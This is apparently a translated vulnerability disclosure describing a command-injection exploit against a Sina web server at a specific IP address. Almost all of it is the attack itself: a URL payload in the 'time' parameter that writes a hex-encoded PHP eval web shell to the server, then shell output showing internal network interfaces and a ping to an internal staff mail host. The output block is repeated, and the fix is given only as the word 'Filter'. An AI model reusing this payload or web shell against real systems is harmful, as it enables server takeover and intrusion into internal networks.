Execute getshell in a code entry of Sina to go to the Intranet.
Http: // 61.135.152.231/webtrans/index. php? Controller = user & action = login
Http: // 61.135.152.231/SetTime/index. php? Time = % 27 set % 7 cset % 26 set % 27
Code execution exists at set
Pwd
Write shell
61.135.152.231//SetTime/index.php?time='set;echo+3C3F706870206576616C28245F504F53545B635D293B3F3E|xxd+-r+-ps+>/var/www/webbak/template/1.php;ls+'
http://61.135.152.231/webbak/template/1.php c
[/var/www/webbak/template/]$ /sbin/ifconfigeth0 Link encap:Ethernet HWaddr 0c:c4:7a:08:7c:7c inet addr:61.135.152.231 Bcast:61.135.152.255 Mask:255.255.255.224 inet6 addr: fe80::ec4:7aff:fe08:7c7c/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:5017795 errors:0 dropped:0 overruns:0 frame:0 TX packets:2704480 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1182610202 (1.1 GB) TX bytes:326898975 (326.8 MB) Memory:f7200000-f7280000 eth1 Link encap:Ethernet HWaddr 0c:c4:7a:08:7c:7d inet addr:192.168.1.145 Bcast:192.168.1.255 Mask:255.255.255.0 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) Memory:f7100000-f7180000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:680777 errors:0 dropped:0 overruns:0 frame:0 TX packets:680777 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:756699997 (756.6 MB) TX bytes:756699997 (756.6 MB)[/var/www/webbak/template/]$ ping -c 1 mail.staff.sina.com.cnPING mail.staff.sina.com.cn (10.210.97.18) 56(84) bytes of data.64 bytes from bogon (10.210.97.18): icmp_req=1 ttl=252 time=0.113 ms--- mail.staff.sina.com.cn ping statistics ---1 packets transmitted, 1 received, 0% packet loss, time 0msrtt min/avg/max/mdev = 0.113/0.113/0.113/0.000 ms[/var/www/webbak/template/]$
[/var/www/webbak/template/]$ /sbin/ifconfigeth0 Link encap:Ethernet HWaddr 0c:c4:7a:08:7c:7c inet addr:61.135.152.231 Bcast:61.135.152.255 Mask:255.255.255.224 inet6 addr: fe80::ec4:7aff:fe08:7c7c/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:5017795 errors:0 dropped:0 overruns:0 frame:0 TX packets:2704480 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1182610202 (1.1 GB) TX bytes:326898975 (326.8 MB) Memory:f7200000-f7280000 eth1 Link encap:Ethernet HWaddr 0c:c4:7a:08:7c:7d inet addr:192.168.1.145 Bcast:192.168.1.255 Mask:255.255.255.0 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) Memory:f7100000-f7180000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:680777 errors:0 dropped:0 overruns:0 frame:0 TX packets:680777 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:756699997 (756.6 MB) TX bytes:756699997 (756.6 MB)[/var/www/webbak/template/]$ ping -c 1 mail.staff.sina.com.cnPING mail.staff.sina.com.cn (10.210.97.18) 56(84) bytes of data.64 bytes from bogon (10.210.97.18): icmp_req=1 ttl=252 time=0.113 ms--- mail.staff.sina.com.cn ping statistics ---1 packets transmitted, 1 received, 0% packet loss, time 0msrtt min/avg/max/mdev = 0.113/0.113/0.113/0.000 ms[/var/www/webbak/template/]$
Solution:
Filter